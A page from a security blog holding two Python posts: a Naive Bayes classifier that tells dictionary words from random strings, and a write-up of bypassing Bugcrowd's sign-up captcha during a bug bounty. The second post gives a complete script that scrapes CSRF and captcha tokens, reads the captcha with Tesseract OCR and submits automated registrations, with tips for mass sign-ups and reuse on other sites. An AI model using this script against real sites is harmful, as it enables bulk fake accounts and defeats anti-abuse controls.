Showing posts with label python. Show all posts
Showing posts with label python. Show all posts

Tuesday, 30 August 2016

Random String Python Text Classifier Example

In this post I'm going to explain how to write a simple NaiveBayes text classifier in Python and provide some example code.

Machine Learning!? Awesome!!1!

My original goal was to tell the difference between regular dictionary words and random strings. I looked at using manual ngram frequency analysis and this partially worked but I wanted to try out an ML solution for comparison.

I don't have much ML experience but it was easy to build a working script using the scikit library. This library abstracts away much of the mathematical complexity and offers a quick and high level way to implement ML concepts. In just a few lines of python I was able to build a classifier with 93% accuracy.

It's worth mentioning I did not use the "bag of words" approach as I was looking at analysing the structure of individual words as opposed to sentences. Changing the CountVectorizer parameters you could look at sentences or groups of words.

Building a Classifier

Building a classifier is quite simple, you just need to collect your data, format it, vectorize it, then train your model. In my script below I pretty much follow that process. First up I read in some data using pandas. I have two csv data sets, one file has normal dictionary words, the other random words. Each row contains the type, 0 or 1 (normal or random), and then the data which is just a word. For example:

normal.csv random.csv
0,apple 1,fdsgsdgfdg
0,banana 1,plicawq
0,orange               1,mncdlppl

In each file I used the first 5000 words for training and the last 5000 for testing. To vectorize the words I used the CountVectorizer with the ngram function, this breaks the words up based on their ngrams and converts them to numbers.

With the data ready I used the "fit" function to train the classifier with the training data set. To measure the accuracy of the model I used the "score" function and test data set. And finally to manually test some values I used the "predict" function. In the end my classifier could function with a 93% accuracy which I thought was pretty good considering I made hardly any customisations.

I used the Multinomial Naive Bayes function as this was recommended however other algorithms may work more effectively. The classifier and vectorizer also support a number of additional parameters that can be adjusted to improve the accuracy, I modified them only slightly, further improvements could likely be made here as well.

The Code

The following requires Python 2.7, scikit, pandas and also the two csv files containing data as described above.

from sklearn.feature_extraction.text import CountVectorizer from sklearn.naive_bayes import MultinomialNB import pandas as pd from time import time #Start timer t0 = time() #Create classifier and vectorizer clf = MultinomialNB(alpha=0.1) vec = CountVectorizer(analyzer='char_wb', ngram_range=(2, 4), min_df=1) #Read in wordset and vectorize words #Training data train_set = pd.concat(pd.read_csv(f, names=["type","word"], nrows=5000) for f in ["normal.csv","random.csv"]) train_types = train_set.type.tolist() train_words = vec.fit_transform(train_set.word.tolist()) #Test data test_set = pd.concat(pd.read_csv(f, names=["type","word"], skiprows=5000, nrows=5000) for f in ["normal.csv","random.csv"]) test_types = test_set.type.tolist() test_words = vec.transform(test_set.word.tolist()) #Train classifier clf.fit(train_words, train_types) train_time = time() - t0 print("Training time: %0.3fs" % train_time) #Use test data to evaluate classifier print "Accuracy is " + str(clf.score(test_words, test_types)) test_time = time() - train_time - t0 print("Testing time: %0.3fs" % test_time) #Classify words testdata = ['xgrdqwlpfrr','apple'] print testdata print clf.predict(vec.transform(testdata)) predict_time = time() - test_time - train_time - t0 print("Predict time: %0.3fs" % predict_time) 

Running the script should give you something like the following:


Scikit Tips

If you're trying to install scikit in windows you'll need to install the relevant .whl package. In Linux I had to upgrade pip before it would install.


Final Thoughts

I was amazed how quick and easy it was to write a simple classifier, machine learning has definitely gone mainstream. I focused on finding the difference between normal and random strings however classifiers can be used to tell the difference between all kinds of data sets.

Obviously being a security blog you may be wondering why I'd be looking into text classifiers. Well when analysing data to detect attackers you'll often want to classify various activity. Performing analysis with a classifier can give some interesting results :)

Hope you guys have found this useful, any questions or comments, leave a message below.

Pwndizzle out.

Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog here: http://blog.bugcrowd.com/guest-blog-breaking-bugcrowds-captcha-pwndizzle/


A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.


So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw such as the captcha code being included on the current page or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).  


OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return you a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as it's engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd captcha was so simple all I needed to do was enlarge the image before submitting to Tesseract for analysis to succeed most of the time. For other more complex captchas that use distorted characters or overlays to mask the text you will need to clean the image before submitting to Tesseract. Some examples can be found in the references below.


Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests, one to retrieve the sign-up page (containing captcha and csrf) and a second request to send sign-up data (username, email, password etc.) To automate the whole process the script would need to download a copy of the sign-up page, extract the csrf and captcha tokens, download and analyse the captcha then submit a sign-up request containing the following:


Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha # Created by @pwndizzle - http://pwndizzle.blogspot.com from PIL import Image from urllib.error import * from urllib.request import * from urllib.parse import * import re import subprocess def getpage(): try: print("[+] Downloading Page"); site = urlopen("https://portal.bugcrowd.com/user/sign_up") site_html = site.read().decode("utf-8") global csrf #Parse page for CSRF token (string 43 characters long ending with =) csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html) print ("-----CSRF Token: " + csrf[0]) global ctoken #Parse page for captcha token (string 40 characters long) ctoken = re.findall('[a-z0-9]{40}', site_html) print ("-----Captcha Token: " + ctoken[0]) except URLError as e: print ("*****Error: Cannot retrieve URL*****"); def getcaptcha(): try: print("[+] Downloading Captcha"); captchaurl = "https://portal.bugcrowd.com/simple_captcha?code="+ctoken[0] urlretrieve(captchaurl,'captcha1.png') except URLError as e: print ("*****Error: Cannot retrieve URL*****"); def resizer(): print("[+] Resizing..."); im1 = Image.open("captcha1.png") width, height = im1.size im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC) im2.save("captcha2.png") def tesseract(): try: print("[+] Running Tesseract..."); #Run Tesseract, -psm 8, tells Tesseract we are looking for a single word subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8']) f = open ("C:\Python33\output.txt","r") global cvalue #Remove whitespace and newlines from Tesseract output cvaluelines = f.read().replace(" ", "").split('\n') cvalue = cvaluelines[0] print("-----Captcha: " + cvalue); except Exception as e: print ("Error: " + str(e)) def send(): try: print("[+] Sending request..."); user = "testuser99" params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'@test.com', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'} data = urlencode(params).encode('utf-8') request = Request("https://portal.bugcrowd.com/user") #Send request and analyse response f = urlopen(request, data) response = f.read().decode('utf-8') #Check for error message fail = re.search('The following errors occurred', response) if fail: print("-----Account creation failed!") else: print ("-----Account created!") except Exception as e: print ("Error: " + str(e)) print("[+] Start!"); #Download page and parse data getpage(); #Download captcha image getcaptcha(); #Resize captcha image resizer(); #Need more filtering? Add subroutines here! #Use Tesseract to analyse captcha image tesseract(); #Send request to site containing form data and captcha send(); print("[+] Finished!"); 

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:


Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  •  Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha, means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about. E.g. Each ip cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.


Final Thoughts

I like the concept of captchas, current machines struggle with optical recognition and an image check is all it takes to prevent automation. As demonstrated though simple letter/number captchas can be easy to break and everyday use can frustrate users. For me images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games like those offered by http://areyouahuman.com/ appear to be an interesting alternative that offer effective anti-automation (for now) with improved user experience.  

If you want to re-use the script it should work fine on other machines and sites but you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha your targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Also cleaning catpchas with Imagemagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.